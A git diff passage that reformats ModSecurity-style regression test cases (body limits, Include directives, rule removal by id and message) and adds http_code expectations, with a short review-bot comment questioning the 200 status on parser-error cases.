@@ -676,27 +688,27 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "--0000\n", "Content-Disposition: form-data; name=\"a\"\n", @@ -709,21 +721,21 @@ "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", 
@@ -731,27 +743,27 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "--0000\n", "Content-Disposition: form-data; name=\"a\"\n", @@ -764,20 +776,20 @@ "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 120", @@ -785,4 +797,3 @@ ] } ] - diff --git a/test/test-cases/regression/config-calling_phases_by_name.json b/test/test-cases/regression/config-calling_phases_by_name.json index 39bd6f46d2..8e82a19172 100644 --- a/test/test-cases/regression/config-calling_phases_by_name.json +++ b/test/test-cases/regression/config-calling_phases_by_name.json 
@@ -1,79 +1,87 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"id:1,phase:request,pass,chain\"", "SecRule MATCHED_VAR \"@contains asdf\" \"\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,pass,phase:response,id:28\"", "SecRule MATCHED_VAR \"@contains Aasdf\" \"\"", @@ -83,4 +91,3 @@ ] } ] - 
diff --git a/test/test-cases/regression/config-include-bad.json b/test/test-cases/regression/config-include-bad.json index 76797552d7..74cd0ee6cc 100644 --- a/test/test-cases/regression/config-include-bad.json +++ b/test/test-cases/regression/config-include-bad.json 
@@ -1,51 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include - bad rule", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - bad rule", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example3.txt. Line: 2. Column: 66. Expecting an action, got: ops \"id:1000,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example3.txt", "SecRule ARGS \"@missing_operator test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing file", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing file", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: config-include-bad.json. Line: 2. Column: 46. test-cases/data/config_example-ops.txt: Not able to open file." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing at include", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing at include", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example-ops-include.txt. Line: 1. Column: 52. test-cases/data/config_example-not-exist.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops-include.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - duplicate id", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - duplicate id", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rule id: 40 is duplicated" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "Include test-cases/data/config_example.txt", diff --git a/test/test-cases/regression/config-include.json b/test/test-cases/regression/config-include.json index ab73de0760..ade9fa8d87 100644 --- a/test/test-cases/regression/config-include.json +++ b/test/test-cases/regression/config-include.json 
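Review bot: The added `"http_code": 200` sits beside a `parser_error` expectation in all four cases of config-include-bad.json, and the same pairing appears in "Include (7/8)" in config-include.json. A rule set that fails to parse presumably never evaluates the placeholder request added here, so the status expectation is not exercised. A reader could take 200 as the intended, fail-open outcome of a broken configuration. Whether the harness now requires the key is not visible in this hunk; if it does not, I would drop `"http_code"` from the parser-error cases. The last case's rules array continues outside the hunk.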
@@ -1,199 +1,219 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include (1/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (1/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (2/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (2/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (3/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (3/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (4/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (4/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"", "Include test-cases/data/config_example2.txt" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (5/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (5/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "Include test-cases/data/config_example.txt", 
@@ -201,120 +221,132 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (6/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (6/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." 
+ "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (7/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (7/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "parser_error":"Looking at: 'test-cases/data/conasdffig_example2.txt'" + "expected": { + "http_code": 200, + "parser_error": "Looking at: 'test-cases/data/conasdffig_example2.txt'" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/conasdffig_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (8/8) -- quoted with wildcard", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (8/8) -- quoted with wildcard", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include \"test-cases/data/config_ex*ple2.txt\"", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" 
diff --git a/test/test-cases/regression/config-remove_by_id.json b/test/test-cases/regression/config-remove_by_id.json index 9f074420b8..969a881c2b 100644 --- a/test/test-cases/regression/config-remove_by_id.json +++ b/test/test-cases/regression/config-remove_by_id.json @@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 2", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", 
@@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", 
@@ -82,40 +90,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1 2-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_msg.json b/test/test-cases/regression/config-remove_by_msg.json index 36cb3cab06..a2e7721597 100644 --- a/test/test-cases/regression/config-remove_by_msg.json +++ b/test/test-cases/regression/config-remove_by_msg.json 
@@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,msg:'tag123'\"", 
@@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '3'. 